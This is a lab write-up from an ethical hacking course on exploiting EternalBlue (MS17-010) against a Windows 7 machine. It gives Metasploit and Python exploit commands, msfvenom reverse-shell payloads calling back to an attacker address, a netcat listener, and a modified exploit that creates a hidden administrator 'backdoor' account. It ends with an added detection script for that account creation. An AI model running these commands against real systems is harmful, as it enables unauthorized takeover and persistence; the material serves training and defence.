In this blog we will be walking through a machine from the Cybermentors course, Practical Ethical Hacking (PEH). The main lesson of this post is manual exploitation of the EternalBlue vulnerability (MS17-010): we will walk through three methods of manual exploitation as well as the Metasploit module.
Although this machine wasn't too challenging, I did learn a new way to exploit this vulnerability by modifying a public exploit, which I then used on another machine that I am currently writing a blog post for.
An easy level CTF style challenge
Approx. 15 mins to complete
Target Enumeration
To start off with this machine I used a tool called nmapAutomator to speed up and automate my scans; this is a popular tool that I also used in my first OSCP exam attempt. From the scan results below we see that, among a number of open ports, ports 139 and 445 are open, which we know to be SMB. The OS version is Windows 7 SP1, which is known to be vulnerable to MS17-010 (EternalBlue).
SMB Enumeration
To enumerate SMB further and see what shares are being exposed, I used smbclient to list the shares and connect to them. Unfortunately, there was nothing of interest for us here: only the default shares, with nothing interesting in them. Note that the backslashes in the UNC path have to be escaped (or the whole path quoted) so the shell does not swallow them.
smbclient -L \\\\192.168.100.12
smbclient \\\\192.168.100.12\\SHARE-NAME\$
Exploiting EternalBlue
Method 1 - Metasploit
The first and easiest method of exploitation, which takes no more than 30 seconds, is to use Metasploit. We use the exploit 'windows/smb/ms17_010_eternalblue', set RHOSTS to the IP address of our target and run the exploit. After a few seconds we get a meterpreter session and can drop into a shell as SYSTEM.
Method 2 - send_and_execute.py
Our next method of manual exploitation uses a Python 2 script by helviojunior called 'send_and_execute.py'. This exploit works by copying an executable that we specify to the C:\ directory of the target and then executing it. When I tried to run the exploit I ran into a few issues, the first of which was that I needed to freshly re-install impacket for Python 2.
python2 send_and_execute.py 192.168.100.12 shell.exe 443
First I used pip2 to upgrade setuptools.
sudo pip2 install --upgrade setuptools
Then we install impacket with pip2 so we can run the Python exploit.
sudo pip2 install impacket
With everything installed, we generate our reverse shell executable and then run the exploit against the target using the commands below.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.73 LPORT=443 -f exe > shell.exe
python2 send_and_execute.py 192.168.100.12 shell.exe 445
We then start our listener (before running the exploit) and catch a reverse shell as SYSTEM, successfully exploiting EternalBlue.
nc -nvlp 443
Method 3 - 42315.py
The next method of exploitation uses my favourite Python script for its versatility and ease of modification; it can easily be found in searchsploit with the search term 'eternalblue'. We will take exploit 42315.py and save it to our current directory.
searchsploit -m windows/remote/42315.py
We run the exploit against our target and see in the last two lines of the output that it executed successfully and created a file named pwned.txt in the C:\ directory. We now know we can exploit this vulnerability and write to that directory, so we can modify the exploit to upload and execute a shell instead.
The following lines of code are responsible for creating a connection to the target, connecting to the C$ share and then creating the file 'pwned.txt'.
We will modify this code so that it sends our own shell.exe to the target, and add a line at the end to execute it.
We use the following msfvenom command to generate the reverse shell executable that will be sent to the target.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.73 LPORT=443 -f exe > shell.exe
We then start our netcat listener and execute the modified exploit to catch the reverse shell.
As shown below, we have now successfully caught a SYSTEM-level reverse shell on the machine.
Method 4 - 42315.py - Backdoor user
Using the same exploit as in method 3, we modify the code so that, instead of trying to get a reverse shell, it creates a new local user named backdoor and adds it to the Administrators group.
We can confirm that our new backdoor user has been created and is a member of the Administrators group.
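From the defender's side, the footprint of method 4 is a pair of Windows Security events on the target: 4720 (user account created) followed almost immediately by 4732 (member added to the built-in Administrators group, SID S-1-5-32-544), both performed by the machine account because the exploit runs as SYSTEM. The following detection logic is an added example, not code from the original post or from the 42315.py exploit; the event records are constructed to mimic what a log shipper would forward, and the time window and the field names are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample Security log records (not from the original post).
# 4720 = user account created, 4732 = member added to a security-enabled local group.
# 'subject' is the account that performed the action; an exploit running as SYSTEM
# shows up as the computer account (name ending in '$').
SAMPLE_EVENTS = [
    {"time": "2023-05-01T10:00:00", "id": 4720, "host": "WIN7-PC", "subject": "WIN7-PC$",
     "target": "backdoor", "group_sid": None},
    {"time": "2023-05-01T10:00:02", "id": 4732, "host": "WIN7-PC", "subject": "WIN7-PC$",
     "target": "backdoor", "group_sid": "S-1-5-32-544"},
    {"time": "2023-05-01T11:30:00", "id": 4720, "host": "WIN7-PC", "subject": "helpdesk",
     "target": "svc_backup", "group_sid": None},
    {"time": "2023-05-02T09:00:00", "id": 4732, "host": "WIN7-PC", "subject": "helpdesk",
     "target": "svc_backup", "group_sid": "S-1-5-32-555"},  # Remote Desktop Users, a day later
]

ADMINISTRATORS_SID = "S-1-5-32-544"  # well-known SID of the built-in Administrators group


def find_backdoor_admins(events, window=timedelta(minutes=10)):
    """Return one finding per account that was created and then added to the local
    Administrators group within `window`. Each finding is
    (host, user, created_at_iso, created_by_system) where created_by_system is True
    when the creating subject was the machine account, i.e. SYSTEM context."""
    created = {}   # (host, user) -> (creation time, subject)
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        key = (ev["host"], ev["target"].lower())
        if ev["id"] == 4720:
            created[key] = (t, ev["subject"])
        elif ev["id"] == 4732 and ev["group_sid"] == ADMINISTRATORS_SID:
            hit = created.get(key)
            if hit is not None and t - hit[0] <= window:
                findings.append((ev["host"], ev["target"], hit[0].isoformat(),
                                 hit[1].endswith("$")))
    return findings


if __name__ == "__main__":
    for host, user, when, by_system in find_backdoor_admins(SAMPLE_EVENTS):
        flag = "created from SYSTEM context" if by_system else "created by a user account"
        print("ALERT %s: %s made local admin right after creation at %s (%s)" % (host, user, when, flag))
```

The svc_backup account is deliberately left out of the findings: it was created by a named user and only added to Remote Desktop Users a day later, which is the kind of ordinary administration this rule should not fire on.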
In order to move laterally in a network, we could use a tool called psexec, which would allow us to get a shell on a machine using the credentials of a local administrator user. We explore this tool and evil-winrm further in my previous blog posts, Golden ticket attacks and Attackive directory. However, in this lab set-up we do not have writable shares that psexec could use, so instead we could modify this exploit further to add the user to the Remote Desktop Users group and RDP into the machine, which we will explore in a future blog post.
Congratulations, we have walked through four different methods of exploiting the EternalBlue vulnerability in Windows. From here we have a backdoor user for persistence, and we could gain a shell using the methods covered earlier in this post. If this were a domain-joined machine we would want to work our way up to Domain Admin; if not, we could take this further and download and install a RAT for redundancy and as another method of persistence.
I hope I explained my method clearly and provided justified reasoning for the actions I took. If you have any feedback, I would love to hear it, as I want to keep improving.